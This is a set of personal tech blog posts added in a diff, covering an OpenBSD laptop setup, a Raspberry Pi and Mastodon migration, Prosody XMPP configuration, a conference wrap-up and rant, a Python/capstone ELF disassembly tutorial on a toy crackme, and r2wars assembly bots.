+   A "security professional" suggesting that we roll our own crypto? What
+   even. Oh and, to top it off -- when [1]Raman, very rightly countered
+   saying that the biggest opponent to encryption is the Government, and
+   trusting them to build safe cryptosystems is probably not wise, he
+   responded by saying something to the effect of "Eh, who cares? If they
+   want to backdoor it, let them."
+
+   Bruh moment.
+
+   He also had some interesting things to say about countering
+   disinformation. He said, and I quote "Join the STFU University".
+
+   ¿wat? Is that your best solution?
+
+   Judging by his profile, and certain other things he said in the talk,
+   it is safe to conclude that his ideals are fairly...nationalistic. I'm
+   not one to police political opinions, I couldn't care less which way
+   you lean, but the statements made in the talk were straight up
+   incorrect.
+
+Closing thoughts
+
+   This came out more rant-like than I'd intended. It is also the first
+   blog post where I dip my toes into politics. I've some thoughts on more
+   controversial topics for my next entry. That'll be fun, especially when
+   my follower count starts dropping. LULW.
+
+   Saumil, if you ever end up reading this, note that this is not a
+   personal attack. I think you're a cool guy.
+
+   Note to the Nullcon organizers: you guys did a fantastic job running
+   the conference despite Corona-chan's best efforts. I'd like to suggest
+   one little thing though -- please VET YOUR SPEAKERS more!
+
+   group pic
+
+References
+
+   1. https://twitter.com/tame_wildcard

@@ -0,0 +1,143 @@ 
+   17 April, 2020
+
+OpenBSD on the HP Envy 13
+
+I put a blowfish in my laptop this week
+
+   My existing KISS install broke because I thought it would be a great
+   idea to have [1]apk-tools alongside the kiss package manager. It's safe
+   to say, that did not end well -- especially when I installed, and then
+   removed a package. With a semi-broken install that I didn't feel like
+   fixing, I figured I'd give OpenBSD a try. And I did.
+
+installation and setup
+
+   Ran into some trouble booting off the USB initially, turned out to be a
+   faulty stick. Those things aren't built to last, sadly. Flashed a new
+   stick, booted up. Setup was pleasant, very straightforward. Didn't
+   really have to intervene much.
+
+   After booting in, I was greeted with a very archaic looking FVWM
+   desktop. It's not the prettiest thing, and especially annoying to work
+   with when you don't have your mouse setup, i.e. no tap-to-click.
+
+   I needed wireless, and my laptop doesn't have an Ethernet port. USB
+   tethering just works, but the connection kept dying. I'm not sure why.
+   Instead, I downloaded the [2]iwm(4) firmware from [3]here, loaded it up
+   on a USB stick and copied it over to /etc/firmware. After that, it was
+   as simple as running [4]fw_update(1) and the firmware is auto-detected
+   and loaded. In fact, if you have working Internet, fw_update will
+   download the required firmware for you, too.
+
+   Configuring wireless is painless and I'm so glad to see that there's no
+   wpa_supplicant horror to deal with. It's as simple as:
+$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK
+
+   Also see [5]hostname.if(5) to make this persist. After that, it's only
+   a matter of specifying your desired SSID, and ifconfig will
+   automatically auth and procure an IP lease.
+$ doas ifconfig iwm0 nwid YOUR_SSID
+
+   By now I was really starting to get exasperated by FVWM, and decided to
+   switch to something nicer. I tried building 2bwm (my previous WM), but
+   that failed. I didn't bother trying to figure this out, so I figured
+   I'd give [6]cwm(1) a shot. Afterall, people sing high praises of it.
+
+   And boy, is it good. The config is a breeze, and actually pretty
+   powerful. [7]Here's mine. cwm also has a built-in launcher, so dmenu
+   isn't necessary anymore. Refer to [8]cwmrc(5) for all the config
+   options.
+
+   Touchpad was pretty simple to setup too -- OpenBSD has [9]wsconsctl(8),
+   which lets you set your tap-to-click, mouse acceleration etc. However,
+   more advanced configuration can be achieved by getting Xorg to use the
+   Synaptics driver. Just add a 70-synaptics.conf to /etc/X11/xorg.conf.d
+   (make the dir if it doesn't exist), containing:
+Section "InputClass"
+        Identifier "touchpad catchall"
+        Driver "synaptics"
+        MatchIsTouchpad "on"
+    Option "TapButton1" "1"
+    Option "TapButton2" "3"
+    Option "TapButton3" "2"
+    Option "VertEdgeScroll" "on"
+    Option "VertTwoFingerScroll" "on"
+    Option "HorizEdgeScroll" "on"
+    Option "HorizTwoFingerScroll" "on"
+        Option "VertScrollDelta" "111"
+        Option "HorizScrollDelta" "111"
+EndSection
+
+   There are a lot more options that can be configured, see
+   [10]synaptics(4).
+
+   Suspend and hibernate just work, thanks to [11]apm(8). Suspend on
+   lid-close just needs one sysctl tweak:
+$ sysctl machdep.lidaction=1
+
+   I believe it's set to 1 by default on some installs, but I'm not sure.
+
+impressions
+
+   I already really like the philosophy of OpenBSD -- security and
+   simplicity, while not losing out on sanity. The default install is
+   plentiful, and has just about everything you'd need to get going. I
+   especially enjoy how everything just works! I was pleasantly surprised
+   to see my brightness and volume keys work without any configuration!
+   It's clear that the devs actually dogfood OpenBSD, unlike uh, cough
+   Free- cough. Gosh I hope it's not the flu. :^)
+
+   Oh and did you notice all the manpage links I've littered throughout
+   this post? They have manpages for everything; it's ridiculous. And
+   they're very thorough. Arch Wiki is good, but it's incorrect at times,
+   or simply outdated. OpenBSD's manpages, although catering only to
+   OpenBSD have never failed me.
+
+   Performance and battery life are fine. Battery is in fact, identical,
+   if not better than on Linux. OpenBSD disables HyperThreading/SMT for
+   security reasons, but you can manually enable it if you wish to do so:
+$ sysctl hw.smt=1
+
+   Package management is probably the only place where OpenBSD falls
+   short. [12]pkg_add(1) isn't particularly fast, considering it's written
+   in Perl. The ports selection is fine, I have yet to find something that
+   I need not on there. I also wish they debloated packages; maybe I've
+   just been spoilt by KISS. I now have D-Bus on my system thanks to
+   Firefox. :(
+
+   I appreciate the fact that they don't have a political document -- a
+   Code of Conduct. CoCs are awful, and have only proven to be harmful for
+   projects; part of the reason why I'm sick of Linux and its community.
+   Oh wait, OpenBSD does have one: [13]https://www.openbsd.org/mail.html
+   ;)
+
+   I'll be exploring [14]vmd(8) to see if I can get a Linux environment
+   going. Perhaps that'll be my next post, but when have I ever delivered?
+
+   I'll close this post off with my new rice, and a sick ASCII art I made.
+      \. -- --./
+      / ^ ^ ^ \
+    (o)(o) ^ ^ |_/|
+     {} ^ ^ > ^| \|
+      \^ ^ ^ ^/
+       / -- --\
+                    ~icy
+
+   openbsd rice
+
+References
+
+   1. https://github.com/alpinelinux/apk-tools
+   2. http://man.openbsd.org/iwm.4
+   3. http://firmware.openbsd.org/firmware/6.6/
+   4. http://man.openbsd.org/fw_update.1
+   5. http://man.openbsd.org/hostname.if.5
+   6. http://man.openbsd.org/cwm.1
+   7. https://github.com/icyphox/dotfiles/blob/master/home/.cwmrc
+   8. https://man.openbsd.org/cwmrc.5
+   9. http://man.openbsd.org/wsconsctl.8
+  10. http://man.openbsd.org/synaptics.4
+  11. http://man.openbsd.org/apm.8
+  12. http://man.openbsd.org/pkg_add.1
+  13. https://www.openbsd.org/mail.html
+  14. http://man.openbsd.org/vmd.8

@@ -0,0 +1,87 @@ 
+   04 June, 2020
+
+Migrating to the RPi
+
+Raspberry Pi shenanigans, and other things
+
+   I'd ordered the Raspberry Pi 4B (the 4GB variant), sometime early this
+   year, thinking I'd get to self-hosting everything on it as soon as it
+   arrived. As things turn out, it ended up sitting in its box up until
+   two weeks ago -- it took me that long to order an SD card for it. No, I
+   didn't have one. Anyway, from there began quite the wild ride.
+
+flashing the SD card
+
+   You'd think this would be easy right? Just plug it into your laptop's
+   SD card reader (or microSD), and flash it like you would a USB drive.
+   Well, nope. Of the three laptops at home one doesn't have an SD card
+   reader, mine -- running OpenBSD -- didn't detect it, and my brother's
+   -- running Void -- didn't detect it either.
+
+   Then it hit me: my phone (my brother's, actually), has an SD card slot
+   that actually works. Perhaps I can use the phone to flash the image?
+   Took a bit of DDG'ing (ducking?), but we eventually figured out that
+   the block-device for the SD on the phone was /dev/mmcblk1. Writing to
+   it was just the usual dd invocation.
+
+got NAT'd
+
+   After the initial setup, I was eager to move my services off the
+   Digital Ocean VPS, to the RPi. I set up the SSH port forward through my
+   router config, as a test. Turns out my ISP has me NAT'd. The entirety
+   of my apartment is serviced by these fellas, and they have us all under
+   a CG-NAT. Fantastic.
+
+   Evading this means I either lease a public IP from the ISP, or I
+   continue using my VPS, and port forward traffic from it via a tunnel. I
+   went with option two since it gives me something to do.
+
+NAT evasion
+
+   This was fairly simple to setup with Wireguard and iptables. I don't
+   really want to get into detail here, since it's been documented aplenty
+   online, but in essence you put your VPS and the Pi on the same network,
+   and forward traffic hitting your internet facing interface (eth0) to
+   the VPN's (wg0). Fairly simple stuff.
+
+setting up Mastodon on the Pi
+
+   Mastodon was kind of annoying to get working. My initial plan was to
+   port forward only a few selected ports, have Mastodon exposed on the Pi
+   at some port via nginx, and then front that nginx via the VPS. So
+   basically: Mastodon (localhost on Pi) <-> nginx (on Pi) <-> nginx (on
+   VPS, via Wireguard). I hope that made sense.
+
+   Anyway, this setup would require having Mastodon run on HTTP, since
+   I'll be HTTPS'ing at the VPS. If you think about it, it's kinda like
+   what Cloudflare does. But, Mastodon doesn't like running on HTTP. It
+   just wasn't working. So I went all in and decided to forward all
+   ^80/[443] traffic and serve everything off the Pi.
+
+   Getting back to Mastodon -- the initial few hiccups aside, I was able
+   to get it running at toot.icyphox.sh. However, as a seeker of
+   aesthetics, I wanted my handle to be @icyphox.sh. Turns out, this can
+   be achieved fairly easily.
+
+   Add a new WEB_DOMAIN variable to your .env.production file, found in
+   your Mastodon root dir. Set WEB_DOMAIN to your desired domain, and
+   LOCAL_DOMAIN to the, well, undesired one. In my case:
+WEB_DOMAIN=icyphox.sh
+LOCAL_DOMAIN=toot.icyphox.sh
+
+   Funnily enough, the [1]official documentation for this says the exact
+   opposite, which...doesn't work.
+
+   I don't really understand, but whatever it works and now my Mastodon is
+   @[2]x@icyphox.sh. I'm not complaining. Send mail if you know what's
+   going on here.
+
+   And oh, here's the protective case [3]nerd fashioned out of cardboard.
+
+   raspberry pi case
+
+References
+
+   1. https://github.com/tootsuite/documentation/blob/archive/Running-Mastodon/Serving_a_different_domain.md
+   2. https://toot.icyphox.sh/@x
+   3. https://peppe.rs/

@@ -0,0 +1,138 @@ 
+   18 February, 2020
+
+Setting up Prosody for XMPP
+
+I setup Prosody yesterday--here's how I did it
+
+   Remember the [1]IRC for DMs article I wrote a while back? Well...it's
+   safe to say that IRC didn't hold up too well. It first started with the
+   bot. Buggy code, crashed a lot -- we eventually gave up and didn't
+   bring the bot back up. Then came the notifications, or lack thereof.
+   Revolution IRC has a bug where your custom notification rules just get
+   ignored after a while. In my case, this meant that notifications for
+   #crimson stopped entirely. Unless, of course, Nerdy pinged me each
+   time.
+
+   Again, none of these problems are inherent to IRC itself. IRC is
+   fantastic, but perhaps wasn't the best fit for our usecase. I still do
+   use IRC though, just not for 1-on-1 conversations.
+
+Why XMPP?
+
+   For one, it's better suited for 1-on-1 conversations. It also has
+   support for end-to-end encryption (via OMEMO), something IRC doesn't
+   have.^[2]1 Also, it isn't centralized (think: email).
+
+So...Prosody
+
+   [3]Prosody is an XMPP server. Why did I choose this over ejabberd,
+   OpenFire, etc.? No reason, really. Their website looked cool, I guess.
+
+Installing
+
+   Setting it up was pretty painless (I've [4]experienced worse). If
+   you're on a Debian-derived system, add:
+# modify according to your distro
+deb https://packages.prosody.im/debian buster main
+
+   to your /etc/apt/sources.list, and:
+# apt update
+# apt install prosody
+
+Configuring
+
+   Once installed, you will find the config file at
+   /etc/prosody/prosody.cfg.lua. Add your XMPP user (we will make this
+   later), to the admins = {} line.
+admins = {"user@chat.example.com"}
+
+   Head to the modules_enabled section, and add this to it:
+modules_enabled = {
+    "posix";
+    "omemo_all_access";
+...
+    -- uncomment these
+    "groups";
+    "mam";
+    -- and any others you think you may need
+}
+
+   We will install the omemo_all_access module later.
+
+   Set c2s_require_encryption, s2s_require_encryption, and s2s_secure_auth
+   to true. Set the pidfile to /tmp/prosody.pid (or just leave it as
+   default?).
+
+   By default, Prosody stores passwords in plain-text, so fix that by
+   setting authentication to "internal_hashed"
+
+   Head to the VirtualHost section, and add your vhost. Right above it,
+   set the path to the HTTPS certificate and key:
+certificates = "certs"    -- relative to your config file location
+https_certificate = "certs/chat.example.com.crt"
+https_key = "certs/chat.example.com.key"
+...
+
+VirtualHost "chat.example.com"
+
+   I generated these certs using Let's Encrypt's certbot, you can use
+   whatever. Here's what I did:
+# certbot --nginx -d chat.example.com
+
+   This generates certs at /etc/letsencrypt/live/chat.example.com/. You
+   can trivially import these certs into Prosody's /etc/prosody/certs/
+   directory using:
+# prosodyctl cert import /etc/letsencrypt/live/chat.example.com
+
+Plugins
+
+   All the modules for Prosody can be hg clone'd from
+   [5]https://hg.prosody.im/prosody-modules. You will, obviously, need
+   Mercurial installed for this.
+
+   Clone it somewhere, and:
+# cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules
+
+   Do the same thing for whatever other module you choose to install.
+   Don't forget to add it to the modules_enabled section in the config.
+
+Adding users
+
+   prosodyctl makes this a fairly simple task:
+$ prosodyctl adduser user@chat.example.com
+
+   You will be prompted for a password. You can optionally, enable user
+   registrations from XMPP/Jabber clients (security risk!), by setting
+   allow_registration = true.
+
+   I may have missed something important, so here's [6]my config for
+   reference.
+
+Closing notes
+
+   That's pretty much all you need for 1-on-1 E2EE chats. I don't know
+   much about group chats just yet -- trying to create a group in
+   Conversations gives a "No group chat server found". I will figure it
+   out later.
+
+   Another thing that doesn't work in Conversations is adding an account
+   using an SRV record.^[7]2 Which kinda sucks, because having a chat.
+   subdomain isn't very clean, but whatever.
+
+   Oh, also -- you can message me at [8]icy@chat.icyphox.sh.
+     __________________________________________________________________
+
+    1. I'm told IRC supports OTR, but I haven't ever tried.
+    2. [9]https://prosody.im/doc/dns
+
+References
+
+   1. https://icyphox.sh/blog/irc-for-dms/
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/prosody/temp.html#fn:otr
+   3. https://prosody.im/
+   4. https://icyphox.sh/blog/mailserver
+   5. https://hg.prosody.im/prosody-modules
+   6. https://x.icyphox.sh/prosody.cfg.lua
+   7. https://icyphox.sh/home/icy/leet/site/build/blog/prosody/temp.html#fn:srv
+   8. xmpp:icy@chat.icyphox.sh
+   9. https://prosody.im/doc/dns

@@ -0,0 +1,84 @@ 
+   15 October, 2019
+
+PyCon India 2019 wrap-up
+
+Pretty fun weekend, I'd say
+
+   I'm writing this article as I sit in class, back on the grind. Last
+   weekend -- Oct 12th and 13th---was PyCon India 2019, in Chennai, India.
+   It was my first PyCon, and my first ever talk at a major conference!
+   This is an account of the all the cool stuff I saw, people I met and
+   the talks I enjoyed. Forgive the lack of pictures -- I prefer living
+   the moment through my eyes.
+
+Talks
+
+   So much ML! Not that it's a bad thing, but definitely interesting to
+   note. From what I counted, there were about 17 talks tagged under "Data
+   Science, Machine Learning and AI". I'd have liked to see more talks
+   discussing security and privacy, but hey, the organizers can only pick
+   from what's submitted. ;)
+
+   With that point out of the way, here are some of the talks I really
+   liked:
+     * Python Packaging - where we are and where we're headed by
+       [1]Pradyun
+     * Micropython: Building a Physical Inventory Search Engine by
+       [2]Vinay
+     * Ragabot - Music Encoded by [3]Vikrant
+     * Let's Hunt a Memory Leak by [4]Sanket
+     * oh and of course, [5]David Beazley's closing keynote
+
+My talk (!!!)
+
+   My good buddy [6]Raghav and I spoke about our smart lock security
+   research. Agreed, it might have been less "hardware" and more of a bug
+   on the server-side, but that's the thing about IoT right? It's so
+   multi-faceted, and is an amalgamation of so many different hardware and
+   software stacks. But, anyway...
+
+   I was reassured by folks after the talk that the silence during Q/A was
+   the "good" kind of silence. Was it really? I'll never know.
+
+Some nice people I met
+
+     * [7]Abhirath -- A 200 IQ lad. Talked to me about everything from
+       computational biology to the physical implementation of quantum
+       computers.
+     * [8]Abin -- He recognized me from my [9]r/unixporn posts, which was
+       pretty awesome.
+     * [10]Abhishek
+     * Pradyun and Vikrant (linked earlier)
+
+   And a lot of other people doing really great stuff, whose names I'm
+   forgetting.
+
+Pictures!
+
+   It's not much, and I can't be bothered to format them like a collage or
+   whatever, so I'll just dump them here -- as is.
+
+   nice badge awkward smile! me talking s443 @ pycon
+
+C'est tout
+
+   Overall, a great time and a weekend well spent. It was very different
+   from your typical security conference -- a lot more chill, if you will.
+   The organizers did a fantastic job and the entire event was put
+   together really well. I don't have much else to say, but I know for
+   sure that I'll be there next time.
+
+   That was PyCon India, 2019.
+
+References
+
+   1. https://twitter.com/pradyunsg
+   2. https://twitter.com/stonecharioteer
+   3. https://twitter.com/vikipedia
+   4. https://twitter.com/sankeyplus
+   5. https://twitter.com/dabeaz
+   6. https://twitter.com/_vologue
+   7. https://twitter.com/abhirathb
+   8. https://twitter.com/meain_
+   9. https://reddit.com/r/unixporn
+  10. https://twitter.com/h6165

@@ -0,0 +1,313 @@ 
+   08 February, 2019
+
+Python for Reverse Engineering
+
+Building your own disassembly tooling for -- that's right -- fun and profit
+
+   While solving complex reversing challenges, we often use established
+   tools like radare2 or IDA for disassembling and debugging. But there
+   are times when you need to dig in a little deeper and understand how
+   things work under the hood.
+
+   Rolling your own disassembly scripts can be immensely helpful when it
+   comes to automating certain processes, and eventually build your own
+   homebrew reversing toolchain of sorts. At least, that's what I'm
+   attempting anyway.
+
+Setup
+
+   As the title suggests, you're going to need a Python 3 interpreter
+   before anything else. Once you've confirmed beyond reasonable doubt
+   that you do, in fact, have a Python 3 interpreter installed on your
+   system, run
+$ pip install capstone pyelftools
+
+   where capstone is the disassembly engine we'll be scripting with and
+   pyelftools to help parse ELF files.
+
+   With that out of the way, let's start with an example of a basic
+   reversing challenge.
+/* chall.c */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+   char *pw = malloc(9);
+   pw[0] = 'a';
+   for(int i = 1; i <= 8; i++){
+       pw[i] = pw[i - 1] + 1;
+   }
+   pw[9] = '\0';
+   char *in = malloc(10);
+   printf("password: ");
+   fgets(in, 10, stdin);        // 'abcdefghi'
+   if(strcmp(in, pw) == 0) {
+       printf("haha yes!\n");
+   }
+   else {
+       printf("nah dude\n");
+   }
+}
+
+   Compile it with GCC/Clang:
+$ gcc chall.c -o chall.elf
+
+Scripting
+
+   For starters, let's look at the different sections present in the
+   binary.
+# sections.py
+
+from elftools.elf.elffile import ELFFile
+
+with open('./chall.elf', 'rb') as f:
+    e = ELFFile(f)
+    for section in e.iter_sections():
+        print(hex(section['sh_addr']), section.name)
+
+   This script iterates through all the sections and also shows us where
+   it's loaded. This will be pretty useful later. Running it gives us
+> python sections.py
+0x238 .interp
+0x254 .note.ABI-tag
+0x274 .note.gnu.build-id
+0x298 .gnu.hash
+0x2c0 .dynsym
+0x3e0 .dynstr
+0x484 .gnu.version
+0x4a0 .gnu.version_r
+0x4c0 .rela.dyn
+0x598 .rela.plt
+0x610 .init
+0x630 .plt
+0x690 .plt.got
+0x6a0 .text
+0x8f4 .fini
+0x900 .rodata
+0x924 .eh_frame_hdr
+0x960 .eh_frame
+0x200d98 .init_array
+0x200da0 .fini_array
+0x200da8 .dynamic
+0x200f98 .got
+0x201000 .data
+0x201010 .bss
+0x0 .comment
+0x0 .symtab
+0x0 .strtab
+0x0 .shstrtab
+
+   Most of these aren't relevant to us, but a few sections here are to be
+   noted. The .text section contains the instructions (opcodes) that we're
+   after. The .data section should have strings and constants initialized
+   at compile time. Finally, the .plt which is the Procedure Linkage Table
+   and the .got, the Global Offset Table. If you're unsure about what
+   these mean, read up on the ELF format and its internals.
+
+   Since we know that the .text section has the opcodes, let's disassemble
+   the binary starting at that address.
+# disas1.py
+
+from elftools.elf.elffile import ELFFile
+from capstone import *
+
+with open('./bin.elf', 'rb') as f:
+    elf = ELFFile(f)
+    code = elf.get_section_by_name('.text')
+    ops = code.data()
+    addr = code['sh_addr']
+    md = Cs(CS_ARCH_X86, CS_MODE_64)
+    for i in md.disasm(ops, addr):
+        print(f'0x{i.address:x}:\t{i.mnemonic}\t{i.op_str}')
+
+   The code is fairly straightforward (I think). We should be seeing this,
+   on running
+> python disas1.py | less
+0x6a0: xor ebp, ebp
+0x6a2: mov r9, rdx
+0x6a5: pop rsi
+0x6a6: mov rdx, rsp
+0x6a9: and rsp, 0xfffffffffffffff0
+0x6ad: push rax
+0x6ae: push rsp
+0x6af: lea r8, [rip + 0x23a]
+0x6b6: lea rcx, [rip + 0x1c3]
+0x6bd: lea rdi, [rip + 0xe6]
+**0x6c4: call qword ptr [rip + 0x200916]**
+0x6ca: hlt
+... snip ...
+
+   The line in bold is fairly interesting to us. The address at [rip +
+   0x200916] is equivalent to [0x6ca + 0x200916], which in turn evaluates
+   to 0x200fe0. The first call being made to a function at 0x200fe0? What
+   could this function be?
+
+   For this, we will have to look at relocations. Quoting [1]linuxbase.org
+
+     Relocation is the process of connecting symbolic references with
+     symbolic definitions. For example, when a program calls a function,
+     the associated call instruction must transfer control to the proper
+     destination address at execution. Relocatable files must have
+     "relocation entries'' which are necessary because they contain
+     information that describes how to modify their section contents,
+     thus allowing executable and shared object files to hold the right
+     information for a process's program image.
+
+   To try and find these relocation entries, we write a third script.
+# relocations.py
+
+import sys
+from elftools.elf.elffile import ELFFile
+from elftools.elf.relocation import RelocationSection
+
+with open('./chall.elf', 'rb') as f:
+    e = ELFFile(f)
+    for section in e.iter_sections():
+        if isinstance(section, RelocationSection):
+            print(f'{section.name}:')
+            symbol_table = e.get_section(section['sh_link'])
+            for relocation in section.iter_relocations():
+                symbol = symbol_table.get_symbol(relocation['r_info_sym'])
+                addr = hex(relocation['r_offset'])
+                print(f'{symbol.name} {addr}')
+
+   Let's run through this code real quick. We first loop through the
+   sections, and check if it's of the type RelocationSection. We then
+   iterate through the relocations from the symbol table for each section.
+   Finally, running this gives us
+> python relocations.py
+.rela.dyn:
+ 0x200d98
+ 0x200da0
+ 0x201008
+_ITM_deregisterTMCloneTable 0x200fd8
+**__libc_start_main 0x200fe0**
+__gmon_start__ 0x200fe8
+_ITM_registerTMCloneTable 0x200ff0
+__cxa_finalize 0x200ff8
+stdin 0x201010
+.rela.plt:
+puts 0x200fb0
+printf 0x200fb8
+fgets 0x200fc0
+strcmp 0x200fc8
+malloc 0x200fd0
+
+   Remember the function call at 0x200fe0 from earlier? Yep, so that was a
+   call to the well known __libc_start_main. Again, according to
+   [2]linuxbase.org
+
+     The __libc_start_main() function shall perform any necessary
+     initialization of the execution environment, call the main function
+     with appropriate arguments, and handle the return from main(). If
+     the main() function returns, the return value shall be passed to the
+     exit() function.
+
+   And its definition is like so
+int __libc_start_main(int *(main) (int, char * *, char * *),
+int argc, char * * ubp_av,
+void (*init) (void),
+void (*fini) (void),
+void (*rtld_fini) (void),
+void (* stack_end));
+
+   Looking back at our disassembly
+0x6a0: xor ebp, ebp
+0x6a2: mov r9, rdx
+0x6a5: pop rsi
+0x6a6: mov rdx, rsp
+0x6a9: and rsp, 0xfffffffffffffff0
+0x6ad: push rax
+0x6ae: push rsp
+0x6af: lea r8, [rip + 0x23a]
+0x6b6: lea rcx, [rip + 0x1c3]
+**0x6bd: lea rdi, [rip + 0xe6]**
+0x6c4: call qword ptr [rip + 0x200916]
+0x6ca: hlt
+... snip ...
+
+   but this time, at the lea or Load Effective Address instruction, which
+   loads some address [rip + 0xe6] into the rdi register. [rip + 0xe6]
+   evaluates to 0x7aa which happens to be the address of our main()
+   function! How do I know that? Because __libc_start_main(), after doing
+   whatever it does, eventually jumps to the function at rdi, which is
+   generally the main() function. It looks something like this
+
+   To see the disassembly of main, seek to 0x7aa in the output of the
+   script we'd written earlier (disas1.py).
+
+   From what we discovered earlier, each call instruction points to some
+   function which we can see from the relocation entries. So following
+   each call into their relocations gives us this
+printf 0x650
+fgets  0x660
+strcmp 0x670
+malloc 0x680
+
+   Putting all this together, things start falling into place. Let me
+   highlight the key sections of the disassembly here. It's pretty
+   self-explanatory.
+0x7b2: mov edi, 0xa  ; 10
+0x7b7: call 0x680    ; malloc
+
+   The loop to populate the *pw string
+0x7d0:  mov     eax, dword ptr [rbp - 0x14]
+0x7d3:  cdqe
+0x7d5:  lea     rdx, [rax - 1]
+0x7d9:  mov     rax, qword ptr [rbp - 0x10]
+0x7dd:  add     rax, rdx
+0x7e0:  movzx   eax, byte ptr [rax]
+0x7e3:  lea     ecx, [rax + 1]
+0x7e6:  mov     eax, dword ptr [rbp - 0x14]
+0x7e9:  movsxd  rdx, eax
+0x7ec:  mov     rax, qword ptr [rbp - 0x10]
+0x7f0:  add     rax, rdx
+0x7f3:  mov     edx, ecx
+0x7f5:  mov     byte ptr [rax], dl
+0x7f7:  add     dword ptr [rbp - 0x14], 1
+0x7fb:  cmp     dword ptr [rbp - 0x14], 8
+0x7ff:  jle     0x7d0
+
+   And this looks like our strcmp()
+0x843:  mov     rdx, qword ptr [rbp - 0x10] ; *in
+0x847:  mov     rax, qword ptr [rbp - 8]    ; *pw
+0x84b:  mov     rsi, rdx
+0x84e:  mov     rdi, rax
+0x851:  call    0x670                       ; strcmp
+0x856:  test    eax, eax                    ; is = 0?
+0x858:  jne     0x868                       ; no? jump to 0x868
+0x85a:  lea     rdi, [rip + 0xae]           ; "haha yes!"
+0x861:  call    0x640                       ; puts
+0x866:  jmp     0x874
+0x868:  lea     rdi, [rip + 0xaa]           ; "nah dude"
+0x86f:  call    0x640                       ; puts
+
+   I'm not sure why it uses puts here? I might be missing something;
+   perhaps printf calls puts. I could be wrong. I also confirmed with
+   radare2 that those locations are actually the strings "haha yes!" and
+   "nah dude".
+
+   Update: It's because of compiler optimization. A printf() (in this
+   case) is seen as a bit overkill, and hence gets simplified to a puts().
+
+Conclusion
+
+   Wew, that took quite some time. But we're done. If you're a beginner,
+   you might find this extremely confusing, or probably didn't even
+   understand what was going on. And that's okay. Building an intuition
+   for reading and grokking disassembly comes with practice. I'm no good
+   at it either.
+
+   All the code used in this post is here:
+   [3]https://github.com/icyphox/asdf/tree/master/reversing-elf
+
+   Ciao for now, and I'll see ya in #2 of this series -- PE binaries.
+   Whenever that is.
+
+References
+
+   1. http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html
+   2. http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib%20--%20libc-start-main-.html
+   3. https://github.com/icyphox/asdf/tree/master/reversing-elf

@@ -0,0 +1,202 @@ 
+   13 September, 2020
+
+My submissions for r2wars 2020
+
+If I learnt one thing, it's that ARM is the future
+
+   [1]r2wars is a [2]CoreWar-like game thar runs within the radare2
+   [3]ESIL virtual machine. In short, you have two programs running in a
+   shared memory space (1kb), with the goal of killing the other and
+   surviving as long as possible. r2wars was conducted as a part of
+   [4]r2con2020.
+
+day 1
+
+   My first submission was an incredibly simple "bomber". All it does is
+   write code to a location, jump there, and continue executing the same
+   thing over and over.
+mov eax, 0xfeebfeeb; just some bad jumps
+mov ebx, eax
+mov ecx, eax
+mov edx, eax
+mov ebp, eax
+mov edi, eax
+mov esp, 0x3fc
+mov esi, 0x3fd
+mov [esi], 0xe6ff60
+jmp esi
+
+   Specifically, it writes 0xe6ff60, which is
+pushal
+jmp esi
+
+   effectively looping over and over. pushal is a very interesting x86
+   instruction, that pushes all the registers and decrements the stack
+   pointer esp by how many ever bytes were pushed. Nifty, especially if
+   you're looking for high throughput (to bomb the address space). Here,
+   it starts bombing from 0x3fc - 0x000 (and below, because there's no
+   bounds checking in place), and ends up killing itself, since writing
+   outside of the arena (0x000 - 0x400) is illegal.
+
+   Ultimately, this bot placed 7th out of 9 contestants -- an
+   underwhelming outcome. I had to fix this.
+
+   day 1
+
+day 2
+
+   I sat for a second and recollected the different reasons for my bot
+   getting killed, and the one that occurred the most was my bot
+   insta-dying to bad instructions being written from 0x400 -- i.e. from
+   near where I'm positioned. Nearly all competing bots write from bottom
+   up, because pushal decrements the stack pointer. So the obvious
+   solution was to reposition my initial payload way above, at 0x000. And
+   of course, it goes without saying that this assumes everyone's using
+   pushal (they are).
+mov eax, 0xffffffff
+mov ecx, eax
+mov edx, eax
+mov ebx, eax
+mov ebp, eax
+mov esi, eax
+
+check:
+    mov edi, 0x000
+    cmp [edi], 0
+    jne planb
+    mov esp, 0x400
+    inc edi
+    mov [edi], 0xe7ff6060; pushal, jmp edi
+    jmp edi
+
+planb:
+    mov edi, 0x3fb
+    mov [edi], 0xe7ff6060
+    mov esp, 0x3fa
+    jmp edi
+
+   I also added a (pretty redundant) check to see if the stuff at edi was
+   0, since the entire arena is initially 0x0. My reasoning, albeit
+   flawed, was that if it wasn't 0, then it was unsafe to go there. In
+   hindsight, it would've been safer, since it's already been written over
+   by somebody. In any case, planb never got executed because of what I'd
+   mentioned earlier -- everyone writes from 0x400. Or anywhere above
+   0x000, for that matter. So I'm relatively safer than I was in day 1.
+
+   These changes paid off, though. I placed 4th on day 2, out of 13
+   contestants! This screenshot was taken on my phone as I was eating
+   dinner.
+
+   day 2
+
+   All wasn't well though -- I still lost 4 matches, for the reasons
+   below:
+    1. I'd get snuffed out before my bomb wave from 0x400 would reach the
+       opponent.
+    2. I'd end up bombing myself without hitting anyone on the way up.
+
+day 3
+
+   I needed to add some checks to prevent killing myself in the process of
+   bombing.
+mov eax, 0xffffffff
+mov ecx, eax
+mov edx, eax
+mov ebx, eax
+mov ebp, eax
+mov esi, eax
+
+mov edi, 0x000
+mov esp, 0x400
+mov [edi], 0x20fc8360
+mov [edi+4], 0xff600374
+mov [edi+8], 0x0400bce7
+mov [edi+12], 0xe7ff0000
+jmp edi
+
+   If you noticed, the initial payload I'm writing to the address at edi
+   is a bit more complex this time -- let's break it down.
+0x20fc8360
+0xff600374
+0x0400bce7
+0xe7ff0000
+
+   This translates to:
+60                pushal
+83 FC 20          cmp    esp, 0x20
+74 03             je     9
+60                pushal
+FF E7             jmp    edi
+BC 04 00 00 00    mov    esp, 0x400; <- 0x9
+FF E7             jmp    edi
+
+   I check if the stack pointer is 0x20 (decrements from 0x400 due to
+   pushal); if yes, reset to 0x400, else continue looping. This prevented
+   me from writing myself over, and also resets bombing from 0x400 --
+   better chance of hitting someone we missed in our first wave.
+
+   Sounds good? That's what I thought too. Day 3 had a bunch of new bot
+   submissions (and some updated submissions), and a lot of them checked
+   0x000 for existence of a bot, effectively recking me. I placed 8th out
+   of 14 contestants, with 7 wins and 6 losses. Tough day.
